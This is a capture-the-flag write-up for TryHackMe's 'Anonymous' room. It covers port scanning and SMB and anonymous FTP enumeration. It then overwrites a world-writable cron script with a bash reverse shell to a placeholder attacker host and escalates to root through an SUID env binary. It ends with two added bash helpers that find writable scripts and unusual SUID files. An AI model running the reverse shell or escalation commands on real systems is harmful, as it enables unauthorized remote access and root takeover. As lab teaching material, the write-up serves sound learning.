# Writeup [Anonymous](https://tryhackme.com/room/anonymous)
> Let's connect and start the box.
> As soon as we get the IP, start with a full port scan (`-p-` for all TCP ports, `-A` for version and script scans, `-Pn` to skip host discovery):
> ***==nmap -p- -A -Pn <ip>==***
```
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.4.67.68
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCi47ePYjDctfwgAphABwT1jpPkKajXoLvf3bb/zvpvDvXwWKnm6nZuzL2HA1veSQa90ydSSpg8S+B8SLpkFycv7iSy2/Jmf7qY+8oQxWThH1fwBMIO5g/TTtRRta6IPoKaMCle8hnp5pSP5D4saCpSW3E5rKd8qj3oAj6S8TWgE9cBNJbMRtVu1+sKjUy/7ymikcPGAjRSSaFDroF9fmGDQtd61oU5waKqurhZpre70UfOkZGWt6954rwbXthTeEjf+4J5+gIPDLcKzVO7BxkuJgTqk4lE9ZU/5INBXGpgI5r4mZknbEPJKS47XaOvkqm9QWveoOSQgkqdhIPjnhD
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPjHnAlR7sBuoSM2X5sATLllsFrcUNpTS87qXzhMD99aGGzyOlnWmjHGNmm34cWSzOohxhoK2fv9NWwcIQ5A/ng=
| 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDHIuFL9AdcmaAIY7u+aJil1covB44FA632BSQ7sUqap
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
Host script results:
|_clock-skew: mean: 0s, deviation: 1s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 45858/tcp): CLEAN (Couldn't connect)
| Check 2 (port 40699/tcp): CLEAN (Couldn't connect)
| Check 3 (port 37880/udp): CLEAN (Failed to receive data)
| Check 4 (port 23981/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| ANONYMOUS<00> Flags: <unique><active>
| ANONYMOUS<03> Flags: <unique><active>
| ANONYMOUS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2022-06-18T14:21:43+00:00
| smb2-time:
| date: 2022-06-18T14:21:43
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
```
### So let's answer the basic questions asked
- [x] **Number of ports open - 4**
- [x] **Service running on port 21 - ftp**
- [x] **Service running on ports 139,445 - smb**
## Let's start the enumeration
> The most interesting thing is the SMB service, so let's find out what is on it. List the shares with a null session (just press Enter at the password prompt):
***==smbclient -L <ip>==***
```
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
pics Disk My SMB Share Directory for Pics
IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP ANONYMOUS
```
Let's check every share:
***==smbclient //<ip>/sharename==***
>Nothing useful in `print$` and `IPC$`. `pics` contains some images, but they were of no use either.


>Now let's check the `ftp` service. nmap already told us anonymous login is allowed and that the `scripts` directory is world-writable, so log in as `anonymous` (any password), `cd scripts`, `ls`, and `get` the three files in there.


>Now let's check the files that we retrieved
>`clean.sh`

>`removed_files.log`

>`to_do.txt`

>We can see `clean.sh` is readable and writable by everyone (the `scripts` directory was listed as `drwxrwxrwx` in the nmap output), and `removed_files.log` shows it is being executed repeatedly, with its output going to that log. Whatever we write into it will run as the user that executes it, so the plan is to turn it into a **reverse shell**.
Let's change `clean.sh`:
***==`vim clean.sh`==***
```
#!/bin/bash
bash -i >& /dev/tcp/<attacker-ip>/9005 0>&1
```
>Start the listener on our machine first, so it is already waiting when the script next runs:
***==nc -lnvp 9005==***
>Then upload the modified script over FTP (inside the `ftp` session, in the `scripts` directory):
**==`put clean.sh`==**
>Once the shell connects, upgrade it to a proper tty from inside the caught shell (this is where the `pty` one-liner belongs, not inside `clean.sh`, where it would only run after the reverse shell exits):
***==python -c 'import pty; pty.spawn("/bin/bash")'==***
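As an added example (not part of the original writeup), here is a small bash script that finds the weakness we just abused in a more general way: any regular file under a directory that group or others can write. It builds a constructed stand-in for the `scripts` directory in a temp dir (the file contents are placeholders, not the real ones from the box; only the permissions matter) and reports `clean.sh`. On a real box you would run `find_writable_scripts /path` against the directories a cron job or service reads scripts from. It assumes GNU find (for `-printf`).

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup: find scripts that group or
# others can write. A world-writable script that something else executes on
# a schedule (clean.sh on this box) lets whoever can write it run code as the
# executing user. Assumes GNU find for -printf.
set -u

# Print "PATH MODE OWNER" for every regular file under $1 that has the
# group-write (020) or other-write (002) permission bit set.
find_writable_scripts() {
    local dir="$1"
    find "$dir" -type f \( -perm -002 -o -perm -020 \) -printf '%p %m %u\n' 2>/dev/null | sort
}

# Build a constructed stand-in for the FTP "scripts" directory in a temp dir.
# File contents are placeholders; only the permissions matter for the check.
make_fixture() {
    local dir
    dir="$(mktemp -d)"
    printf '#!/bin/bash\n# placeholder body\n' > "$dir/clean.sh"
    printf 'placeholder log line\n' > "$dir/removed_files.log"
    printf 'placeholder note\n' > "$dir/to_do.txt"
    chmod 777 "$dir/clean.sh"                          # the weakness: anyone can edit it
    chmod 644 "$dir/removed_files.log" "$dir/to_do.txt"  # readable, not writable by others
    printf '%s\n' "$dir"
}

# Stand-alone demo: only clean.sh should be reported.
demo_dir="$(make_fixture)"
find_writable_scripts "$demo_dir"
rm -rf "$demo_dir"
```

The check deliberately looks at the permission bits rather than file names or extensions: an executed script is dangerous because of who can modify it, not because of what it is called.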

## Here comes the user flag

## Now let's do privilege escalation and get the root flag
>Let's look for SUID binaries for privilege escalation. Note the leading minus in `-perm -4000` ("setuid bit set"); a plain `-perm 4000` only matches files whose mode is exactly 4000 and would miss almost everything:
***==find / -type f -perm -4000 2>/dev/null==***

>Among all of these binaries, `env` is the one that usually doesn't have the SUID bit set.
> We can look up how to abuse an SUID `env` in the cheat sheet at [GTFOBins](https://gtfobins.github.io/): run a shell through it with `-p` so the effective uid (root) is kept instead of being dropped.
Let's use
***==/usr/bin/env /bin/sh -p==***
>And with that we become root.
Just `cat` `root.txt` from `/root`.
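Added example (not from the original writeup): a bash helper that does the SUID hunt with the correct `find` syntax and then splits the list into expected and unexpected binaries, so an outlier like `/usr/bin/env` stands out instead of being buried among `sudo`, `passwd` and `mount`. The baseline list is an assumption (a rough stock-Ubuntu set; trim it to your target), and the sample listing at the bottom is constructed, standing in for the real output of `list_suid /` on the box.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup: enumerate SUID binaries and
# separate the usual suspects from anything unexpected. An SUID /usr/bin/env
# is the kind of outlier this surfaces; GTFOBins then gives the escalation
# (env /bin/sh -p keeps the effective uid instead of dropping it).

# Binaries that are normally SUID-root on a stock Ubuntu install. This
# baseline is an assumption; anything not in it deserves a look.
SUID_BASELINE="sudo su passwd chsh chfn gpasswd newgrp mount umount fusermount pkexec ping"

# Enumerate SUID files under $1 (default /). -perm -4000 means "setuid bit
# set"; plain -perm 4000 would only match a mode of exactly 4000.
list_suid() {
    find "${1:-/}" -type f -perm -4000 2>/dev/null | sort
}

# Read candidate paths on stdin, print those whose basename is not in the
# baseline, i.e. the ones worth checking against GTFOBins.
triage_suid() {
    local path name
    while IFS= read -r path; do
        name="${path##*/}"
        case " $SUID_BASELINE " in
            *" $name "*) ;;               # expected SUID binary, skip
            *) printf '%s\n' "$path" ;;   # unexpected: look it up on GTFOBins
        esac
    done
}

# Constructed sample listing, standing in for list_suid output on the box.
SAMPLE_SUID='/usr/bin/sudo
/usr/bin/passwd
/usr/bin/env
/bin/mount
/usr/bin/newgrp'

# Stand-alone demo: only /usr/bin/env should be printed.
printf '%s\n' "$SAMPLE_SUID" | triage_suid
```

On a live target, pipe the real enumeration through the filter: `list_suid / | triage_suid`. The baseline approach is deliberately simple; a tighter check would compare against the package manager's recorded permissions, but a short allow-list is enough to make one odd binary jump out.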
